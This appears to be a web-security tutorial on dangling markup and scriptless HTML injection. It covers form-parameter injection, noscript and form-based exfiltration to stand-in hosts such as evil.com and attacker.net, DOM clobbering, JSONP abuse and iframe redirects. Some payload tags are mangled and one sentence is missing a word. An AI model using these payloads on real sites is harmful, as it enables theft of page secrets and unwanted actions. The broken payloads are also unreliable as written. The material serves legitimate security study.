Dangling Markup - HTML scriptless injection

and this input field will contain all the content between its double quote and the next double quote in the HTML. This attack mix the "Stealing clear text secrets" with "Stealing forms2".

You can do the same thing injecting a form and an tag. All the data until a closed is found will be sent:

<form action=http://google.com><input type="submit">Click Meinput><select name=xss>

Form parameter injection

You can change the path of a form and insert new values so an unexpected action will be performed:

<form action='/change_settings.php'><input type='hidden' name='invite_user'   value='fredmbogo'>                                        ← Injected lines​<form action="/change_settings.php">                        ← Existing form (ignored by the parser)...<input type="text" name="invite_user" value="">             ← Subverted field...<input type="hidden" name="xsrf_token" value="12345">...form>

Stealing clear text secrets via noscript

Is a tag whose content will be interpreted if the browser doesn't support javascript (you can enable/disable Javascript in Chrome in chrome://settings/content/javascript).

A way to exfiltrate the content of the web page from the point of injection to the bottom to an attacker controlled site will be injecting this:

<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents>noscript>

Bypassing CSP with user interaction

From this portswiggers research you can learn that even from the most CSP restricted environments you can still exfiltrate data with some user interaction. In this occasion we are going to use the payload:

<a href=http://attacker.net/payload.html><font size=100 color=red>You must click mefont>a>+encodeURIComponent(window.name);script>

Misleading script workflow 1 - HTML namespace attack

Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared:

<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup...Share this status update with:                              ← Legitimate optional element of a dialog<input id='share_with' value=''>​...​function submit_status_update() {  ...  request.share_with = document.getElementById('share_with').value;  ...}

Misleading script workflow 2 - Script namespace attack

Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application:

<img id='is_public'>                                        ← Injected markup​...​// Legitimate application code follows​function retrieve_acls() {  ...  if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE    is_public = true;  else    is_public = false;}​function submit_new_acls() {  ...  if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true  ...}

Abuse of JSONP

If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data:

<script src='/editor/sharing.js'>:              ← Legitimate script  function set_sharing(public) {    if (public) request.access_mode = AM_PUBLIC;      else request.access_mode = AM_PRIVATE;    ...  }​<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call  set_sharing({ ... })

Or you can even try to execute some javascript:

<script src='/search?q=a&call=alert(1)'>script>

Iframe abuse

Notice that a child document can view and set location property for parent, even if cross-origin. This means that you can make the client access any other page by loading inside an iframe some code like:

<html><head>head><body><script>top.window.location = "https://attacker.com/hacked.html"script>body>html>

This can be mitigated with something like: sandbox=’ allow-scripts allow-top-navigation’

You could use meta http-equiv to perform several actions like setting a Cookie: or performing a redirect (in 5s in this case):

This can be avoided with a CSP regarding http-equiv ( Content-Security-Policy: default-src 'self';, or Content-Security-Policy: http-equiv 'self';)

New

You can find a very interesting research on exploitable vulnerabilities of thehere. At the moment of this writing you need to enable the portal tag on Chrome in chrome://flags/#enable-portals or it won't work.